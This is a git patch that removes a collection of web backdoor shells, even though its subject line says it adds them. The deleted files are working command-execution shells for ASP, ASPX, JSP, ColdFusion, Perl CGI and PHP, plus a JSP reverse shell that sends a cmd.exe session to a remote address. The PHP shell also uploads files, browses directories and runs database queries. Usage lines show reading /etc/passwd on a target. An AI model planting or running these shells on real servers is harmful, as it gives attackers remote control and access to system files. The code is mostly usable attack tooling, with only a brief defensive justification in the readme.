From 669d752069beb4e148b30dae0b41ba24f45ea477 Mon Sep 17 00:00:00 2001
From: unix23
Date: Tue, 20 Apr 2010 17:41:07 +0000
Subject: [PATCH] added more shells to web-backdoors
---
web-backdoors/wbc-v1b/cfexec.cfm | 43 -----------
web-backdoors/wbc-v1b/cmd-asp-5.1.asp | 41 ----------
web-backdoors/wbc-v1b/cmdasp.asp | 55 --------------
web-backdoors/wbc-v1b/cmdasp.aspx | 42 -----------
web-backdoors/wbc-v1b/cmdjsp.jsp | 32 --------
web-backdoors/wbc-v1b/jsp-reverse.jsp | 91 -----------------------
web-backdoors/wbc-v1b/perlcmd.cgi | 34 ---------
web-backdoors/wbc-v1b/php-backdoor.php | 71 ------------------
web-backdoors/wbc-v1b/readme.txt | 36 ---------
web-backdoors/wbc-v1b/simple-backdoor.php | 17 -----
10 files changed, 462 deletions(-)
delete mode 100644 web-backdoors/wbc-v1b/cfexec.cfm
delete mode 100644 web-backdoors/wbc-v1b/cmd-asp-5.1.asp
delete mode 100644 web-backdoors/wbc-v1b/cmdasp.asp
delete mode 100644 web-backdoors/wbc-v1b/cmdasp.aspx
delete mode 100644 web-backdoors/wbc-v1b/cmdjsp.jsp
delete mode 100644 web-backdoors/wbc-v1b/jsp-reverse.jsp
delete mode 100644 web-backdoors/wbc-v1b/perlcmd.cgi
delete mode 100644 web-backdoors/wbc-v1b/php-backdoor.php
delete mode 100644 web-backdoors/wbc-v1b/readme.txt
delete mode 100644 web-backdoors/wbc-v1b/simple-backdoor.php
diff --git a/web-backdoors/wbc-v1b/cfexec.cfm b/web-backdoors/wbc-v1b/cfexec.cfm
deleted file mode 100644
index 80fb3db..0000000
--- a/web-backdoors/wbc-v1b/cfexec.cfm
+++ /dev/null
@@ -1,43 +0,0 @@
-
-
-
-
-
-Notes:

- -

- - - - - - -
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#" - value="5">
- - - - - - - - -

-#myVar#
-
- - - - - - - diff --git a/web-backdoors/wbc-v1b/cmd-asp-5.1.asp b/web-backdoors/wbc-v1b/cmd-asp-5.1.asp deleted file mode 100644 index c4b93db..0000000 --- a/web-backdoors/wbc-v1b/cmd-asp-5.1.asp +++ /dev/null @@ -1,41 +0,0 @@ -<% - -' ASP Cmd Shell On IIS 5.1 -' brett.moore_at_security-assessment.com -' http://seclists.org/bugtraq/2006/Dec/0226.html - - -Dim oS,oSNet,oFSys, oF,szCMD, szTF -On Error Resume Next -Set oS = Server.CreateObject("WSCRIPT.SHELL") -Set oSNet = Server.CreateObject("WSCRIPT.NETWORK") -Set oFSys = Server.CreateObject("Scripting.FileSystemObject") -szCMD = Request.Form("C") -If (szCMD <> "") Then - szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() - ' Here we do the command - Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & -"""",0,True) - response.write szTF - ' Change perms - Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G -everyone:F",0,True) - Set oF = oFSys.OpenTextFile(szTF,1,False,0) -End If -%> -
" method="POST"> - -
-Machine: <%=oSNet.ComputerName%>
-Username: <%=oSNet.UserName%>
-<% -If (IsObject(oF)) Then - On Error Resume Next - Response.Write Server.HTMLEncode(oF.ReadAll) - oF.Close - Call oS.Run("win.com cmd.exe /c del "& szTF,0,True) -End If - -%> - - diff --git a/web-backdoors/wbc-v1b/cmdasp.asp b/web-backdoors/wbc-v1b/cmdasp.asp deleted file mode 100644 index 31ba9a5..0000000 --- a/web-backdoors/wbc-v1b/cmdasp.asp +++ /dev/null @@ -1,55 +0,0 @@ -<%@ Language=VBScript %> -<% - ' --------------------o0o-------------------- - ' File: CmdAsp.asp - ' Author: Maceo - ' Release: 2000-12-01 - ' OS: Windows 2000, 4.0 NT - ' ------------------------------------------- - - Dim oScript - Dim oScriptNet - Dim oFileSys, oFile - Dim szCMD, szTempFile - - On Error Resume Next - - ' -- create the COM objects that we will be using -- ' - Set oScript = Server.CreateObject("WSCRIPT.SHELL") - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") - - ' -- check for a command that we have posted -- ' - szCMD = Request.Form(".CMD") - If (szCMD <> "") Then - - ' -- Use a poor man's pipe ... a temp file -- ' - szTempFile = "C:\" & oFileSys.GetTempName( ) - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) - - End If - -%> - - -
" method="POST"> - - -
-
-<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
-
-<% - If (IsObject(oFile)) Then - ' -- Read the output from our command and remove the temp file -- ' - On Error Resume Next - Response.Write Server.HTMLEncode(oFile.ReadAll) - oFile.Close - Call oFileSys.DeleteFile(szTempFile, True) - End If -%> - - - - diff --git a/web-backdoors/wbc-v1b/cmdasp.aspx b/web-backdoors/wbc-v1b/cmdasp.aspx deleted file mode 100644 index b420c87..0000000 --- a/web-backdoors/wbc-v1b/cmdasp.aspx +++ /dev/null @@ -1,42 +0,0 @@ -<%@ Page Language="C#" Debug="true" Trace="false" %> -<%@ Import Namespace="System.Diagnostics" %> -<%@ Import Namespace="System.IO" %> - - - -awen asp.net webshell - - -
- - -Command: -
- - - - - diff --git a/web-backdoors/wbc-v1b/cmdjsp.jsp b/web-backdoors/wbc-v1b/cmdjsp.jsp deleted file mode 100644 index 63625af..0000000 --- a/web-backdoors/wbc-v1b/cmdjsp.jsp +++ /dev/null @@ -1,32 +0,0 @@ -// note that linux = cmd and windows = "cmd.exe /c + cmd" - -
- - -
- -<%@ page import="java.io.*" %> -<% - String cmd = request.getParameter("cmd"); - String output = ""; - - if(cmd != null) { - String s = null; - try { - Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); - BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); - while((s = sI.readLine()) != null) { - output += s; - } - } - catch(IOException e) { - e.printStackTrace(); - } - } -%> - -
-<%=output %>
-
- - diff --git a/web-backdoors/wbc-v1b/jsp-reverse.jsp b/web-backdoors/wbc-v1b/jsp-reverse.jsp deleted file mode 100644 index ae9a781..0000000 --- a/web-backdoors/wbc-v1b/jsp-reverse.jsp +++ /dev/null @@ -1,91 +0,0 @@ -// backdoor.jsp -// http://www.security.org.sg/code/jspreverse.html - -<%@ -page import="java.lang.*, java.util.*, java.io.*, java.net.*" -% > -<%! -static class StreamConnector extends Thread -{ - InputStream is; - OutputStream os; - - StreamConnector(InputStream is, OutputStream os) - { - this.is = is; - this.os = os; - } - - public void run() - { - BufferedReader isr = null; - BufferedWriter osw = null; - - try - { - isr = new BufferedReader(new InputStreamReader(is)); - osw = new BufferedWriter(new OutputStreamWriter(os)); - - char buffer[] = new char[8192]; - int lenRead; - - while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) - { - osw.write(buffer, 0, lenRead); - osw.flush(); - } - } - catch (Exception ioe) - - try - { - if(isr != null) isr.close(); - if(osw != null) osw.close(); - } - catch (Exception ioe) - } -} -%> - -

JSP Backdoor Reverse Shell

- -
-IP Address - -Port - - -
-

-


- -<% -String ipAddress = request.getParameter("ipaddress"); -String ipPort = request.getParameter("port"); - -if(ipAddress != null && ipPort != null) -{ - Socket sock = null; - try - { - sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); - - Runtime rt = Runtime.getRuntime(); - Process proc = rt.exec("cmd.exe"); - - StreamConnector outputConnector = - new StreamConnector(proc.getInputStream(), - sock.getOutputStream()); - - StreamConnector inputConnector = - new StreamConnector(sock.getInputStream(), - proc.getOutputStream()); - - outputConnector.start(); - inputConnector.start(); - } - catch(Exception e) -} -%> - - diff --git a/web-backdoors/wbc-v1b/perlcmd.cgi b/web-backdoors/wbc-v1b/perlcmd.cgi deleted file mode 100644 index 05ac4db..0000000 --- a/web-backdoors/wbc-v1b/perlcmd.cgi +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/perl -w - -use strict; - -print "Cache-Control: no-cache\n"; -print "Content-type: text/html\n\n"; - -my $req = $ENV{QUERY_STRING}; - chomp ($req); - $req =~ s/%20/ /g; - $req =~ s/%3b/;/g; - -print ""; - -print ''; - - if (!$req) { - print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd"; - } - else { - print "Executing: $req"; - } - - print "
";
-	my @cmd = `$req`;
-	print "
"; - - foreach my $line (@cmd) { - print $line . "
"; - } - -print ""; - -# diff --git a/web-backdoors/wbc-v1b/php-backdoor.php b/web-backdoors/wbc-v1b/php-backdoor.php deleted file mode 100644 index 7defd37..0000000 --- a/web-backdoors/wbc-v1b/php-backdoor.php +++ /dev/null @@ -1,71 +0,0 @@ -"; - if ($handle = opendir("$d")) { - echo "

listing of $d

"; - while ($dir = readdir($handle)){ - if (is_dir("$d/$dir")) echo ""; - else echo ""; - echo "$dir\n"; - echo ""; - } - - } else echo "opendir() failed"; - closedir($handle); - die ("
"); -} -if(isset($_REQUEST['c'])){ - echo "
";
-	system($_REQUEST['c']);		   
-	die;
-}
-if(isset($_REQUEST['upload'])){
-
-		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
-			else $dir=$_REQUEST['dir'];
-		$fname=$HTTP_POST_FILES['file_name']['name'];
-		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
-			die('file uploading error.');
-}
-if(isset($_REQUEST['mquery'])){
-	
-	$host=$_REQUEST['host'];
-	$usr=$_REQUEST['usr'];
-	$passwd=$_REQUEST['passwd'];
-	$db=$_REQUEST['db'];
-	$mquery=$_REQUEST['mquery'];
-	mysql_connect("$host", "$usr", "$passwd") or
-    die("Could not connect: " . mysql_error());
-    mysql_select_db("$db");
-    $result = mysql_query("$mquery");
-	if($result!=FALSE) echo "

query was executed correctly

\n"; - while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); - mysql_free_result($result); - die; -} -?> -
execute command:
-
-upload file: to dir:   
-
to browse go to http://?d=[directory here] -
for example: -http://?d=/etc on *nix -or http://?d=c:/windows on win -
execute mysql query: -
-host: user: password: - -database: query: -
- - diff --git a/web-backdoors/wbc-v1b/readme.txt b/web-backdoors/wbc-v1b/readme.txt deleted file mode 100644 index f494291..0000000 --- a/web-backdoors/wbc-v1b/readme.txt +++ /dev/null @@ -1,36 +0,0 @@ -Web Backdoor Compilation (wbc) -DK (http://michaeldaw.org) - -Changelog -Date Change -14 Apr 07 Version 1b (pre 1.2 release): -perlcmd.cgi, -cfexec.cfm, -cmdasp.aspx -Dec/06 Version 1 release. - -I have collected some WEB backdoors in the past to exploit -vulnerable file upload facilities and others. I think a -library like this may be useful in a variety of situations. - -Understanding how these backdoors work can help security administrators implement firewalling and security policies to mitigate obvious attacks. - -The package includes: - -Filename Contributer MD5 -cmd-asp-5.1.asp Brett Moore 8baa99666bf3734cbdfdd10088e0cd9f -cmdasp.asp Maceo 57b51418a799d2d016be546f399c2e9b -cmdasp.aspx Dominic Chell 5e83b6ed422399de04408b80f3e5470e -cmdjsp.jsp Unknown b815611cc39f17f05a73444d699341d4 -jsp-reverse.jsp Tan Chew Keong 8b0e6779f25a17f0ffb3df14122ba594 -php-backdoor.php z0mbie 2b5cb105c4ea9b5ebc64705b4bd86bf7 -simple-backdoor.php David Kierznowski f091d1b9274c881f8e41b2f96e6b9936 -perlcmd.cgi David Kierznowski 97ae7222d7f13e908c6d7f563cb1e72b -cfexec.cfm Kurt Grutzmacher bd04f47283c53ca0ce6436a79ccd600f - -Note: readme.txt is also included in this package but not listed here. - -If you have contributions please let me know so that I can add them into a later -release. - - diff --git a/web-backdoors/wbc-v1b/simple-backdoor.php b/web-backdoors/wbc-v1b/simple-backdoor.php deleted file mode 100644 index bc0e778..0000000 --- a/web-backdoors/wbc-v1b/simple-backdoor.php +++ /dev/null @@ -1,17 +0,0 @@ - - -"; - $cmd = ($_REQUEST['cmd']); - system($cmd); - echo "
"; - die; -} - -?> - -Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd - -